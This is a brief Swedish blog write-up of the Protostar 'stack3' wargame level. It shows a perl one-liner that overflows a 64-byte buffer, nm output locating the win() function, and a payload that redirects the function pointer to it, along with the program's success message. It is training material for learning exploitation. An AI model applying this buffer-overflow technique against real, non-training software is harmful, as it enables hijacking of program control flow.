Protostar och stack3

Stack3

Nu blev det lite jobbigare :)
user@protostar:/opt/protostar/bin$ perl -e ‘print ”a”x64′ | ./stack3 user@protostar:/opt/protostar/bin$

Ska se vart funktionen win() finns i minnet. Och nu är ju ASLR avstängd så den blir ju lätt att hitta.
Så nm stack3
så hittar vi vart win funktionen är i minnet.
08048424 T win
Så då slänger vi in det i EIP.
user@protostar:/opt/protostar/bin$ perl -e ‘print ”a”x64 . ”\x24\x84\x04\x08″‘ | ./stack3
calling function pointer, jumping to 0x08048424
code flow successfully changed

Det här inlägget postades i Okategoriserade. Bokmärk permalänken.

Kommentera

E-postadressen publiceras inte. Obligatoriska fält är märkta *


*

Följande HTML-taggar och attribut är tillåtna: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>